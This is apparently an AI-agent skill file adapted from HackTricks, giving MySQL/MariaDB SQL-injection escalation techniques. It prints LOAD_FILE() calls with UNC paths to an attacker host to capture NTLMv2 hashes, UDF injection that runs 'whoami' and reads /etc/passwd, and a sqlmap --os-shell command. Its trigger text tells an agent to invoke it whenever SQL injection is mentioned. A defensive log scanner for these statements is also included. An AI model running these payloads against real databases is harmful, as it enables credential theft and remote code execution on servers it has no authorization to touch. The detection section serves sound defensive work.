Hacktricks-skills mysql-ssrf-rce

MySQL/MariaDB SSRF and RCE exploitation techniques via SQL injection. Use this skill when you have SQL injection access to a MySQL/MariaDB database and want to explore server-side request forgery (SSRF) or remote code execution (RCE) through database functions. Trigger this when investigating SQL injection vulnerabilities, performing authorized penetration testing, or analyzing MySQL database security. Make sure to use this skill whenever the user mentions SQL injection, MySQL exploitation, database SSRF, UDF injection, or wants to escalate from SQLi to code execution.

Install (clone the upstream repo):
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/sql-injection/mysql-injection/mysql-ssrf/SKILL.MD

MySQL SSRF & RCE Exploitation

This skill covers advanced MySQL/MariaDB exploitation techniques for authorized security testing. These methods leverage SQL injection to achieve SSRF and RCE through database functions and user-defined functions.

Prerequisites

Before attempting these techniques, verify:

  • SQL injection access to MySQL/MariaDB/Percona database
  • Appropriate permissions (file_priv, plugin_dir access)
  • Understanding of secure_file_priv configuration
  • Authorization for security testing

SSRF via LOAD_FILE()

The LOAD_FILE() function can initiate network requests when secure_file_priv is empty, meaning no path restriction is in place.

Check Configuration

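SELECT @@secure_file_priv;
-- file_priv is a column of mysql.user, not a system variable
SELECT File_priv FROM mysql.user WHERE CONCAT(user, '@', host) = CURRENT_USER();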

Interpretation:

  • secure_file_priv = '' (empty string): File access unrestricted
  • secure_file_priv = '/var/lib/mysql-files/': Limited to this directory
  • secure_file_priv = NULL: File operations disabled

Windows UNC Path Exploitation

On Windows systems, UNC paths can trigger NTLMv2 hash exfiltration:

-- Backslashes are doubled because \ is the escape character in MySQL string literals
SELECT LOAD_FILE('\\\\attacker.com\\share\\file');

This connects to TCP port 445 and can be used to:

  • Exfiltrate NTLMv2 hashes
  • Access network shares with read privileges
  • Perform SSRF to internal resources

Example:

-- Exfiltrate NTLMv2 hash to attacker's SMB server (backslashes doubled for SQL escaping)
SELECT LOAD_FILE('\\\\192.168.1.100\\share\\capture');

Linux Network File Access

On Linux, network file access depends on OS configuration and mounted filesystems. NFS mounts may be accessible if properly configured.

RCE via User Defined Functions (UDF)

UDF injection allows loading external libraries to execute arbitrary code.

Requirements

  • Write access to @@plugin_dir
  • file_priv = 'Y'
  • secure_file_priv = '' (restriction disabled)

UDF Injection Process

  1. Check plugin directory:

    SELECT @@plugin_dir;
    
  2. Transfer UDF library (hex or base64 encoded)

  3. Create function:

    CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf_sys.so';
    
  4. Execute commands:

    SELECT sys_eval('whoami');
    SELECT sys_eval('cat /etc/passwd');
    

Common UDF Libraries

  • lib_mysqludf_sys - System command execution
  • lib_mysqludf_http - HTTP requests
  • Custom UDF libraries for specific needs

Alternative Plugin Paths

If @@plugin_dir is not writable (MySQL > v5.0.67), try:

  • /usr/lib/mysql/plugin/
  • /usr/lib64/mysql/plugin/
  • /var/lib/mysql/
  • Any directory in system $PATH

Automation with SQLMap

SQLMap supports UDF injection with the --udf-inject flag:

sqlmap -u "http://target/vuln.php?id=1" --udf-inject --os-shell

For blind SQL injections, use output redirection or DNS request smuggling techniques.
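
Detection view of the LOAD_FILE() and UDF sections above, as an added example that is not part of the original skill: a scanner that flags UNC-path LOAD_FILE() calls, CREATE FUNCTION ... SONAME registrations, and later calls to the newly registered function. It assumes statements are available in a general-query-log style layout; the log lines, timestamps, thread ids and the 192.0.2.10 address are constructed, and scan() and baseline_udfs are hypothetical names.

```python
import re

# Patterns for the statements this page describes (added example, not upstream code).
# UNC prefix: \\host or //host; backslashes may appear doubled by SQL string escaping.
UNC_LOAD = re.compile(r"load_file\s*\(\s*'(?:\\{2,4}|//)([^\\/']+)", re.I)
UDF_CREATE = re.compile(
    r"create\s+(?:aggregate\s+)?function\s+`?(\w+)`?\s+returns\s+\w+\s+soname\s+'([^']+)'",
    re.I)
LOG_LINE = re.compile(r"^(\S+)\s+(\d+)\s+Query\s+(.*)$")

def scan(lines, baseline_udfs=frozenset()):
    """Return (timestamp, thread_id, rule, detail) for each suspicious statement.

    baseline_udfs: lowercase names of UDFs the DBA team registered on purpose.
    """
    findings, created = [], set()
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a Query entry (Connect, Quit, malformed line)
        ts, thread, sql = m.group(1), int(m.group(2)), m.group(3)
        unc = UNC_LOAD.search(sql)
        if unc:
            # The server would open an SMB connection to this host.
            findings.append((ts, thread, "load_file_unc", unc.group(1)))
        udf = UDF_CREATE.search(sql)
        if udf and udf.group(1).lower() not in baseline_udfs:
            created.add(udf.group(1).lower())
            findings.append((ts, thread, "udf_create", f"{udf.group(1)} <- {udf.group(2)}"))
            continue
        # Calls to a function that was registered earlier in the same log.
        for name in sorted(created):
            if re.search(rf"\b{re.escape(name)}\s*\(", sql, re.I):
                findings.append((ts, thread, "udf_call", name))
    return findings

# Constructed sample: time, thread id, command, statement.
SAMPLE_LOG = [
    r"2024-05-01T10:00:01.000000Z     41 Query  SELECT name FROM products WHERE id = 7",
    r"2024-05-01T10:00:02.000000Z     41 Query  SELECT LOAD_FILE('/var/lib/mysql-files/export.csv')",
    r"2024-05-01T10:00:03.000000Z     42 Query  SELECT LOAD_FILE('\\\\192.0.2.10\\share\\capture')",
    r"2024-05-01T10:00:04.000000Z     42 Query  CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf_sys.so'",
    r"2024-05-01T10:00:05.000000Z     42 Query  SELECT sys_eval('whoami')",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A local-path LOAD_FILE() such as the second sample line is not flagged, so the rule can sit alongside legitimate file exports under secure_file_priv.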

Safety & Authorization

⚠️ These techniques are for authorized security testing only.

  • Always obtain written authorization before testing
  • Document all findings and methods used
  • Report vulnerabilities responsibly
  • Never use these techniques on systems you don't own or have permission to test
